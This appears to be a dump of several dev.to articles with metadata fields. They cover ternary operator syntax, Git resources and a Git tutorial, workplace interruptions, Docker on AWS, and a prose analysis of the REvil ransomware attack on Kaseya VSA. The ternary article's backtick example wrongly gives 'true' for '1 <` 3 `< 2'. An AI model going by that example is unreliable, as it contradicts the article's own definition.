by the inventor of Relational Algebra, [Edgar. F. Codd](https://en.wikipedia.org/wiki/Edgar_F._Codd).
His notation for denoting theta-joins is ingenious.
For example,
|SQL|Edgar's notation|
|--|--|
|`X join Y on A join Z on B `|`X [A] Y [B] Z`|
The ingenious part about this is that he treats ternary
operator as **decorated binary operators**!
In the above example, the binary operator `[]`, is
decorated/tainted with `A`, giving it a different
meaning.
This actually also relates to the mathematical notation of theta-join:

In this case, thetha symbol is decorating the join
symbol, turning it into a ternary operator that still
behave as a binary operator.
The advantage of this approach is that ternary
operators behave like binary operators, which means
that they can be chained together naturally.
## The Potential Answer
By expanding on the idea where ternary operator are just
decorated/tainted binary operators, I first have this idea:
Ternary operators can be defined using the following syntax:
```
a X[ b ]Y c
```
Where `a`, `b` and `c` are the arguments, and `X[` and
`]Y` are together the name of the ternary operators.
For example, let's define range-check:
```hs
-- Definition
a <[ b ]< c = a < b && b < c
-- Usage
print (1 <[2]< 3) -- true
print (1 <[3]< 2) -- false
```
Assuming `[` `]` is not used anywhere in the syntax of
the language, such ternary operators usage can be parsed
easily. Because whenever the user or machine sees `[` or
`]`, then they can anticipate a ternary operator.
However, the above syntax is obviously too noisy, so to
reduce the noise, we can swap the square brackets `[`
`]`, with one of the most invisible ASCII operator, the backtick.
With this modification, the above range-check can be rewritten as follows:
```hs
-- Definition
a <` b `< c = a < b && b < c
-- Usage
print (1 <` 2 `< 3) -- true
print (1 <` 3 `< 2) -- true
```
Thus, the best mechanism that I can think of so far to define ternary operator is as follows:
```hs
a X` b `Y c
-- Where a, b and c are the arguments
-- while X` and `Y together is the name of the ternary operator
```
Also regarding precedence, ternary operators should have
lower precedence than binary operators, for example:
```
(a <` b + c `< d) MEANS (a <` (b + c) `< d)
```
Regarding, associativity, I will prefer
right-associativity over left-associativity, since it is
more common in most cases.
Therefore:
```
a X` b `Y c X` d `Y e = a X` b `Y (c X` d `Y e)
```
For example, the conditional ternary operator:
```
true then` b `else c = b
false then` b `else c = c
```
Where:
```
a then` b `else c then` d `else e
```
Should conventionally mean (right-associative):
```
a then` b `else (c then` d `else e)
```
Rather than (left-associative):
```
(a then` b `else c) then` d `else e
```
## Conclusion
Hopefully this article has provided you some inspiration
on the mechanism of user-defined ternary operators.
Thanks for reading.
| wongjiahau |
756,044 | Git Learning Materials | Thanks, Everyone For being part of the series From Git to GitHub. This is the 4th and the last Blog... | 13,451 | 2021-07-11T08:11:04 | https://dev.to/vanshsh/git-learning-materials-1ho2 | github | Thanks, Everyone
For being part of the series ***From Git to GitHub***. This is the 4th and the last **Blog of the series**.
In this blog, I will give you various resources to learn, apply, read about Git and GitHub.
## Install Git
- [Git](https://git-scm.com/).
## Youtube Playlists to Learn Git
- [The Net Ninja](https://youtu.be/3RjQznt-8kE) .
- [Traversy Media](https://youtu.be/SWYqp7iY_Tc).
- [Tech with Tim](https://youtu.be/SWYqp7iY_Tc).
## Reading Resources
- [Git](https://git-scm.com/).
- [W3School/Git](https://www.w3schools.com/GIT/default.asp) .
- [MDN docs](https://developer.mozilla.org/en-US/docs/Learn/Tools_and_testing/GitHub) .
## Open Source Contribution
- [First contribution ](https://github.com/firstcontributions).
- [Up for Grab](https://up-for-grabs.net/#/).
- [DRY](https://github.com/danthareja/contribute-to-open-source/issues/1).
- [TEAMMATES](https://github.com/TEAMMATES/teammates/contribute) .
## Books
- [Pro Git Book](https://git-scm.com/book/en/v2).
## Cheatsheet
- [Git Cheatsheet](https://gitcheatsheet.org/).
- [Cheathsheet by GitHub](https://education.github.com/git-cheat-sheet-education.pdf).
## Step by Step Method
- [Learn How to use Git](https://www.deployhq.com/git).
**Thanks again** for being part of the series. And don't worry Git is not that difficult as it seems also you have to not learn everything there are only 10-15 commands that you will use mostly throughout your life.
There are more informative and interesting blogs to come. So stay tuned.
Until then **Keep Learning, Keep Growing**
<h2>Connect with me 👇 </h2>
Twitter|LinkedIn|Gmail|DEV
-------|---------|------|--------
<a href="https://twitter.com/Vanshsh2701" target="_blank"><img src="https://img.icons8.com/clouds/60/000000/twitter.png"/></a>|<a href="https://www.linkedin.com/in/vanshsharma27/" target="_blank"><img src="https://img.icons8.com/bubbles/60/000000/linkedin.png"/></a>|<a href="mailto:vanshsharma9354@gmail.com" target="_blank"><img src="https://img.icons8.com/clouds/60/000000/gmail.png"/></a>|<a href ="https://dev.to/vanshsh" target="_blank"><img src="https://img.icons8.com/office/50/000000/blog.png"/></a>
| vanshsh |
756,160 | Toward solving interruption in Programming | Recently there are developers and creative vocal about how interruption ruin their work. There are... | 0 | 2021-07-11T10:44:07 | https://chrisza.me/interruption-attitude/ | Recently there are developers and creative vocal about how interruption ruin their work.
There are many articles about [flow state](https://www.bbc.com/worklife/article/20190204-how-to-find-your-flow-state-to-be-peak-creative) and [funny cartoon](https://heeris.id.au/2013/this-is-why-you-shouldnt-interrupt-a-programmer/) on how interruption ruin serious thinking work. There is even a [passive-aggressive piece](https://daedtech.com/programmers-teach-non-geeks-the-true-cost-of-interruptions/) talking about teaching non-geeks cost of interruption.
As a developer, while I agree that interruption can ruin work to some degree (which differ for each people), I don't think the passive-aggressive stance most programmer take is productive nor helpful.
First of all, according to my experience in many companies both as a full-time developer, management and consultant, I want to say this out loud:
**No one really want to interrupt your work**
There is no conspiracy where every non-geek role held a secret meeting to figure out how to make programmer life most miserable and decide that throwing non-sense interruptions every hour is the best course of action.
No, that is not the case.
Every interruption has its own reason. Your teammate has some problem they want to solve, and they think you can help.
That's why they come to you. So tell people to stop interrupting will not work, especially if the problem is a shared problem. For example, what happens if sales are about to commit to some scope but don't know the feasibility? Would you want sales to stop interrupting the programmer and figure this out on their own? That obviously will make the matter worse.
There are some necessary interruptions and some not. You cannot just tell people to leave you alone to solve the problem. After all, you don't get paid to solve your personal problem. It is always a shared problem. Everyone in the team is at stake. Cutting interruptions and work in a silo is not a solution.
I believe the solution is to let them know how to interact with you. You have to set your own boundary.
For example, you can say if anything urgent, please call me instead of a message. You can say that if you leave a message, I will read it within a day. If you ping me directly, I will respond every hour. You can also block your flow time on the calendar.
Those are all valid boundaries to set.
And at first, people might mistake the urgency of the situation. Some people might call you on the tiny issue they have. That is fine if it happened the first time. You take that opportunity and categorize this issue. You tell them that next time this type of issue is not as urgent as they might think. If it happens repeatedly, we have to talk with a team about urgency and tradeoffs since interruption has some cost.
In short, rather than complaining about how others are wrong, it's better to tell what's right. We should let others know how to interact with us productively.
And there might be some constraints that we don't know. For example, we might legally bind to report production issues within a specific amount of time. We can work together to solve that constraint.
But first, you need to believe that people are not out there to get you. As I said, there is no conspiracy of non-geeks. Everyone, geeks or non-geeks, just wants to get the best results. We might have a different opinion on how to get it. That's true. They have a reason, strong or weak, they have a reason.
And shutting others of is not going to solve anything. It is a bad stance to take on the interruption problem. It is much better to take a stance of
**I understand why you need to interrupt me. However, this is not productive for all of us. Can we do it differently?**
And that is my rant for today.
| chrisza4 | |
756,172 | Master Git in 7 minutes | Essentially, Git keeps tabs on text changes, but the definition is a version control system. Chances... | 0 | 2021-07-11T12:27:30 | https://valeriavg.dev/master-git-in-7-minutes/ | beginners, git, tutorial, webdev | Essentially, Git keeps tabs on text changes, but the definition is a version control system. Chances are you've already used git one way or another: it is a de-facto standard for code versioning due to it's distributed nature, as opposed to centralised Apache Subversion (SVN).
## Installing Git
To check if you have Git installed run in your terminal:
```sh
git version
# git version 2.30.1 (Apple Git-130)
```
If you don't have it, follow instructions on [https://git-scm.com/downloads](https://git-scm.com/downloads). Mac users can install it with brew: `brew install git`
## Configuring Git
There are just a few things we want to configure:
```sh
git config --global user.name "John Doe" && # your name
git config --global user.email johndoe@example.com && # your email
git config --global init.defaultbranch main # default branch name, to be compatible with GitHub
```
You can see current global configuration with:
```sh
git config --global --list
# Type ":q" to close
```
Git stores configuration in plain text and, if you prefer, you can edit global configuration directly in `~/.gitconfig` or `~/.config/git/config`.
As the command suggests, removing `--global` would make these commands scoped to the current folder. But to test that out we need a repository.
## Creating new repository
A repository is just a folder with all the stuff you want to track. To create one run:
```sh
mkdir gitexample &&
cd gitexample &&
git init
# gitexample git:(main)
```
This command creates a folder `.git` inside `gitexample` folder. That hidden `.git` folder is what makes a repository: all local configuration and changes are stored there.
## Making changes
Let's create something in the repository:
```sh
echo "Hello, Git" >> hello.txt
```
If we ran `git status`, we'll see the newly created untracked file:
```sh
git status
# On branch main
#
# No commits yet
#
# Untracked files:
# (use "git add <file>..." to include in what will be committed)
# hello.txt
#
# nothing added to commit but untracked files present (use "git add" to track)
```
As the output suggests, let add the file. It can be done directly with:
```sh
git add . # Or `git add hello.txt`, if we don't want all files
```
If you check on the repository status now, you'll see that the file is added (aka *staged*), but not yet committed:
```sh
git status
# On branch main
#
# No commits yet
#
# Changes to be committed:
# (use "git rm --cached <file>..." to unstage)
# new file: hello.txt
```
To record the changes, let's commit them:
```sh
git commit -m "Add hello.txt"
# [main (root-commit) a07ee27] Adds hello.txt
# 1 file changed, 2 insertions(+)
# create mode 100644 hello.txt
```
Pro tip: `git commit -m <MESSAGE>` is a short hand command, you can use `git commit` to open editor (mostly vim) and provide a detailed commit description instead.
Let's check the changes with:
```sh
git log
# type :q to close
```
It will show something like:
```sh
commit a07ee270d6bd0419a50d1936ad89b9de0332f375 (HEAD -> main)
Author: Your Name <your@email.address>
Date: Sun Jul 11 11:47:16 2021 +0200
Adds hello.txt
(END)
```
## Creating branches
Having a separate version of the initial code can be useful in a lot of situation: e.g. when testing out a feature you're unsure about or to avoid code conflicts when working together. That's exactly what a git branch is: it grows from a particular point in history.
To create a branch run `git branch NAME` and to switch branch run `git checkout NAME`. Or simply:
```sh
git checkout -b dev # switches to a new branch called "dev"
# Switched to a new branch 'dev'
# gitexample git:(dev)
```
Let's change something in the `hello.txt` file and commit the changes:
```sh
echo "\nHello, Git Branch" >> hello.txt &&
git commit -am "Change hello.txt"
```
Now let's switch back to main version:
```sh
git checkout main &&
cat hello.txt
# Switched to branch 'main'
# Hello, Git
```
As you can see, the file contents are still the same as they were. To compare branches we can run:
```sh
git diff dev
# diff --git a/hello.txt b/hello.txt
# index 360c923..b7aec52 100644
# --- a/hello.txt
# +++ b/hello.txt
# @@ -1,3 +1 @@
# Hello, Git
# -
# -Hello, Git Branch
# (END)
# type ":q" to close
```
Let's make changes in main branch as well:
```sh
echo "\nHi from Main Branch" >> hello.txt &&
git commit -am "Change hello.txt from main"
# [main 9b60c4b] Change hello.txt from main
# 1 file changed, 2 insertions(+)
```
Now let's try to combine the changes:
```sh
git merge dev
# Auto-merging hello.txt
# CONFLICT (content): Merge conflict in hello.txt
# Automatic merge failed; fix conflicts and then commit the result.
```
Because the file was changed in the same place twice we got a conflict. Look at the file:
```sh
cat hello.txt
<<<<<<< HEAD
Hello, Git
Hi from Main Branch
=======
Hello, Git
>>>>>>> dev
```
There is also a tool to see changes separately:
```sh
git diff --ours # :q to close
git diff --theirs #:q to close
```
You can manually edit the file and commit the changes, but let's imagine we only want one of the versions. We'll start with aborting merge:
```sh
git merge --abort
```
And restarting merge with "theirs" strategy, meaning that in case of conflict we'll use whatever incoming branch insists on:
```sh
git merge -X theirs dev
# Auto-merging hello.txt
# Merge made by the 'recursive' strategy.
# hello.txt | 5 +----
# 1 file changed, 1 insertion(+), 4 deletions(-)
```
The opposite to this strategy is "ours". Merging both changes together will require manual editing (or use of `git mergetool`).
To see list of all branches run:
```sh
git branch # type :q to close
# dev
# * main
```
Finally, to delete the branch run:
```sh
git branch -d dev
# Deleted branch dev (was 6259828).
```
## Rebasing branches
Branches "grow" from a particular point in git history, *rebase* allows to change that point. Let's create another branch and add some changes to hello.txt once more time:
```sh
git checkout -b story &&
echo "Once upon a time there was a file">>story.txt &&
git add story.txt &&
git commit -m "Add story.txt"
# Switched to a new branch 'story'
# [story eb996b8] Add story.txt
# 1 file changed, 1 insertion(+)
# create mode 100644 story.txt
```
Now, let's come back to the main branch and add changes there:
```sh
git checkout main &&
echo "Other changes" >> changes.txt &&
git add changes.txt &&
git commit -m "Add changes.txt"
```
To replay the changes we made in `main` to `story` branch run:
```sh
git checkout story &&
git rebase main
# Successfully rebased and updated refs/heads/story.
```
You can see new file created in `main` branch being added to `story` branch:
```sh
ls
# changes.txt hello.txt story.txt
```
Word of caution: do not rebase branches that someone else might have used, e.g. the main branch. Also, keep in mind that every history manipulation on a remote repository will require forcing these changes to take effect.
## Remote repository
If you haven't yet, create a [GitHub](https://github.com/signup) account, login and create a [new empty repository](https://github.com/new) (private or public).
Assuming the repository name was "example" run the following command (change to your username):
```sh
git remote add origin git@github.com:USERNAME/example.git &&
git push -u origin main
```
You can refresh the page and see files in main branch. To push all local branches to remote repository run:
```sh
git push --all origin
```
Let's edit something on GitHub: just click any file and the pencil icon. Add a line with any text you want and press "Commit changes".
Now run this command locally to get the remote changes:
```sh
git checkout main &&
git pull
```
## Managing uncommitted changes
If you want to save your local changes for later you can use `git stash`:
```sh
echo "Changes" >> hello.txt &&
git stash
```
Now you can use following command to check, apply or discard these changes:
```sh
git stash list
# stash@{0}: WIP on main: 92354c8 Update changes.txt
git stash pop # to apply changes
git stash drop # to drop changes
```
Pro tip: you can use stash number, i.e. `git stash pop 0` to apply a particular stash or `git stash drop 0` to drop it.
If you want to discard all local changes and simply restore repository to last committed changes run:
```sh
git restore .
```
## Managing committed changes
Once you create a commit, this change is saved in local git history. As mentioned before, all changes affecting remote history would require a `git push --force`. Keep it in mind for all following commands.
Let's start with editing the last commit message :
```sh
git commit --amend # type :wq to save and close
# Press "i" to edit, "Esc" to stop editing
```
How about we reset everything to the very beginning?
To find the ID of the very first commit run this command and scroll (with arrow down) to the very end:
```sh
git log --abbrev-commit
# commit a07ee27
# Author: Your Name <your@email.address>
Date: Sun Jul 11 11:47:16 2021 +0200
Adds hello.txt
(END)
# type ":q" to close
```
Now run this to reset the repository, but keep all changes unstaged:
```sh
git reset --soft COMMIT # e.g. a07ee27
```
As opposite to it, you can also make a hard reset and get rid of all the changes with `git reset --hard COMMIT`. There are several other types of reset that you can learn from [git documentation](https://git-scm.com/docs/git-reset)
## Aliases
Most of the times you'll be using just a handful of command (checkout, add ,commit, pull, push and merge mostly), but are some things you might want to have around for "just in case".
One way to store those are git aliases. To configure an alias just set it in a config. For example, one alias I use a lot is `git tree`, it prints a nice history log in a form of a tree:
```sh
git config --global alias.tree 'log --graph --decorate --pretty=oneline --abbrev-commit'
# Try it with `git tree`
```
Another useful alias deletes all merged branches:
```sh
git config --global alias.clbr '!git branch --merged | grep -v \* | xargs git branch -D'
```
As you can see it's prefixed with "!", which allows us to use any command, not only git commands.
That's all for today, hope it helps in your developer journey. As always, feel free to share your thoughts and feedback in the comments. Till the next time!
| valeriavg |
756,348 | Docker On AWS | AWS Whitepaper Summary | This content is the summary of the AWS whitepaper entitled “ Docker on AWS “ written by Brandon... | 0 | 2021-07-11T15:54:16 | https://dev.to/awsmenacommunity/docker-on-aws-nji | docker, aws, containers, cloudskills | This content is the summary of the AWS whitepaper entitled “ Docker on AWS “ written by Brandon Chavis and Thomas Jones. It discusses the exploitation of the container’s benefits in AWS. I tried to simplify and to gather the most interesting points from each paragraph, in order to give the readers very brief and effective content.
**PS**: Although the introduction is always ignored by many readers, I found that the authors provided an excellent set of information as an opening to our subject. This is why I found it fruitful o summarize the introduction as well by an explanative figure.

# I. Container Benefits:
The benefits of containers reach all the elements of organizations and they are:
**Speed**: Helps all the contributors to software development activities to act quickly.
**Because:**
1. The architecture of containers allows for full process isolation by using the Linux kernel namespaces and cgroups. Containers are independent and share kernel on host OS(No need for full virtualization or for hypervisor)
2. Containers can be created quickly thanks to their modular nature and lightweight. This becomes more observable in development lifecycle. The granularity leads an easy versioning of released applications .Also it leads to a reduction in resource sharing between application components which minimizes compatibility issues.
**Consistency**: The ability to relocate entire development environments by moving a container between systems highlights.
Containers provide predictable, consistent and stable applications in all the stages of their lifecycle (Development, test and production) as it encapsulates the exact dependencies, thus minimizes the risk of bugs.
**Density and Resource Efficiency**: The enormous support of the community to the Docker project increased density and modularity of computing resources.
• Containers increase the efficiency and the agility of applications thanks to the abstraction from OS and hardware. Multiple containers run on a single system.
• You can make a compromise between what resources containers need and what are the hardware limits of the host to reach a maximum number of containers: Higher density, increasing efficiency of computing resources, saving money of the excessed capacity, changing the number of assigned containers to a host instead of horizontal scaling to reach optimal utilization.
**Flexibility:** Based on Docker portability, ease of deployment, and small size.
• Unlike other applications that require intensive instructions, Docker provides (just like Git) a simple mechanism to download and install containers and their subsequent applications using this command:
$ docker pull
• Docker provides a standard interface : It is easy to deploy
wherever you like and it’s portable between different versions of Linux.
• Containers make microservice architecture possible where services are isolated to adjacent service’s failure and errant patches or upgrades.
• Docker provides clean ,reproducible and modular environment
# II. Containers in AWS:
There are two ways to deploy containers in AWS :
**AWS Elastic Beanstalk:** It is a management layer for AWS services like Amazon EC2, Amazon RDS and ELB.
• It is used to deploy, manage and scale containerized applications
• It can deploy containerized applications to Amazon ECS
• After you specify your requirements (memory, CPU, ports, etc.),it places your containers across your cluster and monitors their health.
• The command-line utility eb can be used to manage AWS Elastic Beanstalk and Docker containers.
• It is used for deploying a limited number of containers
**Amazon EC2 Container Service**
• Amazon ECS is a high performant management system for Docker containers on AWS .
• It helps to launch, manage, run distributed applications and orchestrate thousands of Linux containers on a managed cluster of EC2 instances, without having to build your own cluster management backend.
• It offers multiple ways to manage container scheduling, supporting various applications.
• Amazon ECS container agent is open source and free ,it can be built into any AMI to be used with Amazon ECS
• On a cluster , a task definition is required to define each Docker image ( name ,location, allocated resources,etc.).
• The minimum unit of work in Amazon ECS is ‘a task’ which is a running instance of a task definition.
**About the clusters in this context:**
• Clusters are EC2 instances running the ECS container agent that communicates instance and container state information to the cluster manager and dockerd .
• Instances register with the default or specified cluster.
• A cluster has an Auto Scaling group to satisfy the needs of the container workloads.
• Amazon ECS allows managing a large cluster of instances and containers programmatically.
**Container-Enabled AMIs:** The Amazon ECS-Optimized Amazon Linux AMI includes the Amazon ECS container agent (running inside a Docker container), dockerd (the Docker daemon), and removes the not required packages.
**Container Management:**
Amazon ECS provides optimal control and visibility over containers, clusters, and applications with a simple, detailed API. You just need to call the relevant actions to carry out your management tasks.
Here is a list containing examples of available API Operations for Amazon ECS.

**Scheduling**
• Scheduling ensures that an appropriate number of tasks are constantly running , that tasks are registered against one or more load balancers, and they are rescheduled when a task fails .
• Amazon ECS API actions like StartTask can make appropriate placement decisions based on specific parameters (StartTask decisions are based on business and application requirements).
• Amazon ECS allows the integration with custom or third-party schedulers.
• Amazon ECS includes two built-in schedulers:
1. **The RunTask:** randomly distributes tasks across your cluster.
2. **CreateService:** ideally suited to long-running stateless services.
**Container Repositories**
• Amazon ECS is repository-agnostic so customers can use the repositories of their choice.
• Amazon ECS can integrate with private Docker repositories running in AWS or an on-premises data center.
**Logging and Monitoring**
Amazon ECS supports monitoring of cluster contents with Amazon CloudWatch.
**Storage**
• Amazon ECS allows to store and share information between multiple containers using data volumes. They can be shared on a host as:
•• Empty, non-persistent scratch space for containers
OR
•• Exported volume from one container to be mounted by other containers on mountpoints called containerPaths.
• ECS task definitions can refer to storage locations (instance storage or EBS volumes) on the host as data volumes. The optional parameter referencing a directory on the underlying host is called sourcePath.If it is not provided, data volume is treated as scratch space.
• volumesFrom parameter : defines the relationship of storage between two containers .It requires sourceContainer argument to specify which container's data volume should be mounted.
**Networking**
• Amazon ECS allows networking features (port mapping ,container linking ,security groups ,IP addresses and ressources, network interfaces, etc.).
# III. Container Security
• AWS Costumers combine software capabalities (of Docker, SElinux, iptables,etc) with AWS security measures( IAM, security groups, NACL,VPC) provided in AWS architecture for EC2 and scaled by clusters
• AWS customers maintain, control and configure of the EC2 instances, OS and Docker daemon through AWS deployment &management services.
• Security measures are scaled through clusters.
# IV. Container Use Cases
**1.Batch jobs**
Packaging containers that can batch, extract, transform, and load jobs and deploy them into clusters. Jobs then start quickly. Better performance is witnessed.
**2.Distributed Applications**
Containers build:
• Distributed applications, which provide loose coupling ,elastic and scalable design. They are quick to deploy across heterogeneous servers ,as they are characterized by density ,consistency and flexibility.
• microservices into adequate encapsulation units.
• Batch job processes which can run on a large numbers of containers.
**3.Continuous Integration and Deployment**
Containers are a keystone component of continuous integration (CI) and continuous deployment (CD) workflows. It supports streamlined build, test, and deployment from the same container images. As it leverages CI features in tools like GitHub, Jenkins, and DockerHub
**4.Platform As a Service**
PaaS is a type of service model that presents a set of software, tools and and an underlying infrastructure where the cloud provider manages networking, storage ,OS ,Middleware and the customer performs resources configuration.
**The issue :** Users and their resources need to be isolated .This is a challenging task for PaaS providers .
**The solution:** Containers provide the needed isolation concept .they allows also creating and deploying template resources to simplify isolation process.
Also each product offered by the PaaS provider could be built into its own container and deployed on demand quickly.
# V. Architectural Considerations
All the containers defined in a task are placed onto a single instance in the cluster. So a task represents an application with multiple tiers requiring inter-container communication.
Tasks give users the ability to allocate resources to containers, so containers can be evaluated on resource requirements and collocated.
Amazon ECS provides three API actions for placing containers onto hosts:
**RunTask :** allows a specific cluster instance to be passed as a value in the API call
**StartTask:** uses Amazon ECS scheduler logic to place a task on an open host
**CreateService:** allows for the creation of a Service object, which, combination of a TaskDefinition object and an existing Elastic Load Balancing load.
**Service discovery:** Solves challenges with advertising internal container state, such as current IP address and application status, to other containers running on separate hosts within the cluster. The Amazon ECS describe API actions like describe-service can serve as primitives for service discovery functionality.
# VI. Walkthrough
Since the commands used in this Walkthrough can be exploited in other complex projects, I suggest a bash file that can help to solve repetitive and difficult real-world problems:
View: [link](https://github.com/DorraBoukari/Walkthrough/blob/main/walkthrough.sh)
1.Create your first cluster named ‘Walkthrough’ with `create-cluster` command
PS: each AWS account is limited to two clusters.
2.Add instances
If you would like to control which cluster the instances register to(not to default cluster), you need to input UserData to populate the cluster name into the `/etc/ecs/ecs.config` file.
In this lab, we will launch a web server ,so we configure the correct security group permissions and allow inbound access from anywhere on port 80.
3.Run a quick check with the `list-container-instances` command:
PS: To dig into the instances more, use the `describe-container-instances` command
4.Register a task definition before running in on ECS cluster:
a)Create the task definition:
It is created a the JSON file called ‘nginx_task.json’ . This specific task launches a pre-configured NGINX container from the Docker Hub repository.
View: [link](https://github.com/DorraBoukari/Walkthrough/blob/main/nginx_task.json)
b)Register the task definition with Amazon ECS:
5.Run the Task with `run-task` command:
PS:
• Note of the taskDefinition instance value (Walkthrough:1) returned after task registration in the previous step.
• To obtain the ARN use the `aws ecs list-task-definitions` command.
6.Test the container: The container port is mapped to the instance port 80, so you can curl the utility to test the public IP address .
# Conclusion
This whitepaper summary can be a useful resource for those interested in the cloud native technologies. It sheds the light on containers generally, and Docker on AWS specifically. It details the benefits of those technologies especially while using the EC2 cluster, it gives a step-by-step guide for beginners to deploy their first container on a cluster and also provides a bash Script that helps to automate those tasks in more complex projects.
| dorraelboukari |
756,648 | Connecting RaaS, REvil, Kaseya and your security posture | Ransomware is an epidemic that adversely affects the lives of both individuals and large companies,... | 0 | 2021-07-12T14:40:36 | https://blog.shiftleft.io/connecting-raas-revil-kaseya-and-your-security-posture-3ca854cd4646 | vulnerability, cybersecurity, ransomware | ---
title: Connecting RaaS, REvil, Kaseya and your security posture
published: true
date: 2021-07-11 21:25:04 UTC
tags: vulnerability,cybersecurity,ransomware
canonical_url: https://blog.shiftleft.io/connecting-raas-revil-kaseya-and-your-security-posture-3ca854cd4646
---
Ransomware is an epidemic that adversely affects the lives of both individuals and large companies, where criminals demand payments to release infected digital assets.
In the wake of the ransomware success, **Ransomware-as-a-Service (RaaS)** is being offered as a franchise model that allows people without programming skills to become active attackers and take part in the ransomware economy. This is a way of democratizing crime, giving ordinary people and smaller players an easier way into the criminal market, while reducing the risk of exposure for the ones on top of the value chain. For instance, a dissatisfied employee might decide to partner up with a RaaS developer to effectively infect an organization from the inside and then splitting the profit.
> **Wait a minute, this sounds like SaaS (Software as a Service) with the exception of mal-intent and ‘R’ prefix instead of ‘S’ ?**
Yes, these organized cybercrime groups have been known to offer 24/7 technical support, subscriptions, quality assurance, affiliate schemes, and online forums just like legitimate SaaS companies. They know that offering a quality service to their (admittedly) criminally-minded clients will help both sides of the venture to become wealthy at the expense of victimized individuals or organizations that they prey upon.
> **What led to the inception of RaaS ?**
The first ransomware, known as [AIDS](https://en.wikipedia.org/wiki/AIDS_(Trojan_horse)) ( **Aids Info Disk** or **PC Cyborg Trojan)**, was observed in the wild already in 1989, spreading through the exchange of floppy disks. Following AIDS ransomware, number of ransomware families were quite low for more than two decades, especially the ones with sophisticated destructive capabilities. However, this all changed with the advent of **stronger encryption schemes** in the ransomware code and especially the **availability of cryptocurrency as a payment method** which is fairly difficult to track by law enforcement. In the wake of the ransomware success, **_ransomware-as-a-service_ (RaaS)** has become an entry point for criminals with little programming skills to participate and earn money from ransomware.
> **Is there an underpinning supply-chain that benefits a RaaS provider?**
Contacting ransomware service providers using dark-net markets, prospective and existing criminal networks can cheaply obtain tailor-made ransomware ready to be used on their prospective victims. In addition to the creation fee, the service providers may take a 20–30% revenue share of the ransom as well.
RaaS can have different delivery formats,
- such as source code that the buyer compiles themselves,
- pre-compiled binaries or an interactive interface where the buyer inputs information about the victims.
- Quality testing weaponized source code or per-compiled binaries to ensure that it operates as expected (_usually tested on low risk victims)_
This collaborative strategy is a way of achieving a faster rate of infections with a lower risk of getting caught.
> **Who are the stakeholders in such a ransomware based supply chain?**
The stakeholders involved in the underground economy have different responsibilities and expose themselves to different types of risks. They defined several roles, including
- _virus writers (developers),_
- _website masters/crackers,_
- _envelope_ (account) _stealers,_
- _virtual asset stealers/brokers_ and
- _sellers and players_ (buyers)
- _mixers and tumblers_ (money laundering post-transaction)
> **What is the economics of such an attack from offender and victim’s point of view?**
Similar to a SaaS pricing and distribution model, a victim is profiled and targeted based on their business domain, market share, clients that they serve and WTPR (willingness to pay ransom). The amount of a single ransomware can be of a fixed price or discriminated based on several factors (basis associated with complexity of vulnerability the malware is exploiting).
> **Who is REvil and why are they relevant to this conversation?**
REvil (_also known as Sodin and Sodinokibi_) is a ransomware-as-a-service (RAAS) enterprise that first came to prominence in April 2019. Their claim to fame is based on the employed tactics and techniques which include and not limited it
- Their ideal victim profile (_like ideal customer profile in SaaS_) range from home users to F500 companies
- Known to successfully extort far larger payments from large corporate companies
- Execute methodical workflow to exfiltrate data prior to encrypting for ransomware (_apply additional pressure to leak if victim chooses to restore from backup and not pay ransom_)
- Yes, REvil has its own web presence (a web site) and often release/update a so-called “Happy Blog” listing their victims, sample of exfiltrated data and a “trial” decryption upon sample subset as a proof-of-decryption (this almost sounds like a SaaS activation, acquisition and retention funnel)
- A timer countdown is often pinned to a victim’s profile in order to pressure for response/payment.
> **Who is Kaseya and why are they relevant to this conversation?**
[Kaseya](https://www.kaseya.com/) sells unified IT monitoring & management software for MSP (Managed Service Providers) and IT reams (multi and single site). The MSPs in turn sell monitoring and management services to their customers. Let’s visualize the supply chain distribution of Kaseya software

> **How did REvil victimize Kaseya?**
Kaseya’s VSA server v9.5.6 had multiple vulnerabilities that were responsibly disclosed by [Frank Breedijk](https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/). The vulnerabilities including and not limited to
- SQL command injection — _patched April 10th, 2021_
- Local File Inclusion — _patched May 8th, 2021_
- Credentials Leak — _unpatched (CVE rating 10/10)_ leading to **Request Forgery token bypass**
- a 2FA (2 factor authentication) bypass on limited API scope — _unpatched (CVE rating 9.9)_ leading to **Authentication bypass + Code Injection.** The 2FA logic only protected the VSA dashboard but not Live Connect
- Having more than 1 tab open in Live Connect, with remote-connect into a fleet PC/virtual desktop/workstation & rebooting it would cause it to reconnect from the last opened tab instead (cross connect within and across fleet instances)
- a reflected XSS upon a authenticated API path — _unpatched_

During the month of June/July 2021, REvil discovered the exposed VSA servers (possibly via recon) and further on, discovered the unpatched vulnerabilities. REvil took credit for launching one of the farthest reaching ransomware attacks on record beginning July 2 and demanded $70 million in Bitcoin in exchange for a universal decryption routine.
- The unpatched vulnerabilities on the exposed VSA servers were exploited to introduce a malicious script that was sent to all computers managed by the server, thereby transitively reaching all the end clients. The script further on encrypted the systems.
- Trustwave discovered that the malware won’t execute on systems that have Russian, Ukrainian, Belarusian and Romanian default languages set and former Soviet bloc nations in Central Asia, Caucasus as well as Syria.
<figcaption>Credits : <a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/</a></figcaption>
> **Why did Kaseya fail to address these inherent security issues?**
As per the latest [Bloomberg](https://www.bloomberg.com/news/articles/2021-07-10/kaseya-failed-to-address-security-before-hack-ex-employees-say) article,
> Among the most glaring problems was software underpinned by outdated code, the use of **weak encryption and passwords** in Kaseya’s products and servers, a failure to adhere to basic cybersecurity practices such as regularly patching software and a focus on sales at the expense of other priorities, the employees said.
> One of the former employees said that in early 2019 he sent company leaders a 40-page memo detailing security concerns and was fired about two weeks later, which he believed was related to his repeated efforts to flag the problems.
> Another employee said Kaseya rarely patched its software or servers and **stored customer passwords in clear text — meaning they were unencrypted** — on third-party platforms, practices the employee described as glaring security flaws.
> Some engineers and developers at the company said employees quit over frustration that **new features and products were being prioritized over fixing problems**. Others were laid off in 2018, when Kaseya began moving jobs to Minsk, Belarus, where it recruited more than 40 people to do software development work that had previously been carried out in the U.S., according to two of the former employees familiar with the matter. Four of the ex-workers said they viewed the outsourcing of work to Belarus as a potential security issue, given the country’s close political allegiance with the Russian government.
> **Should we (as SaaS and software vendors) be concerned ?**
